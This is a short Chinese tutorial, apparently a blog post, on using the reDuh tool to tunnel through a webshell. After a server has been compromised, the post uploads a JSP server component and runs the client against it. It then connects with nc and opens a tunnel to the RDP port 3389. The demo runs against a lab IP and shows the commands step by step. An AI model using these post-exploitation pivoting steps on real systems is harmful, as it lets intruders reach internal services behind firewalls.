webshell跳板——reduh的用法介绍

reDuh

0x00 reduh

经常我们拿到一个shell后,发现只将目标服务器的80端口映射到公网ip地址,无法访问其他端口,如3389或3306等

这时可以通过reduh做一个跳板,将特定端口通过开放的80端口从内网中转发出来

0x00 So Easy

首先我们需要一个webshell,这里我直接在虚拟机里面写一个了

image.png

然后通过webshell上传reduh的服务端,在\reDuhServers\目录下
image.png

这里用的jsp的环境就上传一个jsp的服务端
image.png

上传后的地址为http://192.168.49.154:8080/reDuh.jsp

然后本地通过命令行执行reduh的客户端(位于\reDuhClient\dist\目录下)

java -jar reDuhClient.jar http://192.168.49.154:8080/reDuh.jsp
image.png

然后通过nc监听本地1010端口

nc.exe -nvv 127.0.0.1 1010
image.png

然后创建隧道,以将3389端口为例

[createTunnel]6666:127.0.0.1:3389

image.png

然后本地通过mstsc连接127.0.0.1:6666
image.png

这时能看到reduh本地客户端产生了流量
image.png

image.png

这样就可以通过webshell建立其他端口的通信隧道

你可能感兴趣的:(webshell跳板——reduh的用法介绍)